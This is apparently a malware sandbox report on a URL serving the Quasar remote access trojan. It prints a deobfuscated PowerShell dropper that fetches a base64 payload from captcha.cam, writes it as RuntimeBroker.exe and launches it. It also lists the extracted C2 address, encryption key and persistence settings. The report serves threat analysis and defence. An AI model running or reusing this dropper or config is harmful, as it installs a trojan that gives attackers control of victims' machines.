Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://medai.tv

windows10-2004-x64

Resubmissions

30/12/2024, 03:24 UTC

241230-dyd5xswqbv 10

30/12/2024, 03:20 UTC

241230-dvvy9swpcy 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    http://medai.tv

  • Sample

    241230-dyd5xswqbv

Score
10/10
quasar28evasionexecutionphishingransomwarespywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$url = "https://captcha.cam/file.b64"
2
$b64file = "$env:Temp\\file.b64"
3
$exefile = "$env:Temp\\RuntimeBroker.exe"
4
invoke-webrequest -uri $url -outfile $b64file
5
[io.file]::writeallbytes("$env:Temp\\RuntimeBroker.exe", [convert]::frombase64string(get-content "$env:Temp\\file.b64" -raw))
6
start-process "$env:Temp\\RuntimeBroker.exe"
7
URLs
exe.dropper

https://captcha.cam/file.b64

Extracted

Family

quasar

Version

1.4.1

Botnet

28

C2

194.26.192.167:2768

Mutex

859d5f90-e2d0-4b2d-ba9f-5371df032ec2

Attributes
  • encryption_key

    BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    RuntimeBroker

  • subdirectory

    RuntimeBroker

Targets

    • Target

      http://medai.tv

    Score
    10/10
    quasar28evasionexecutionphishingransomwarespywaretrojan

    • Quasar RAT

      Quasar is an open source Remote Access Tool.

      trojanspywarequasar

    • Quasar family

      quasar

    • Quasar payload

    • Modifies boot configuration data using bcdedit

      ransomwareevasion

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution

    • A potential corporate email address has been identified in the URL: currency-file@1

      phishing

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops file in System32 directory

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.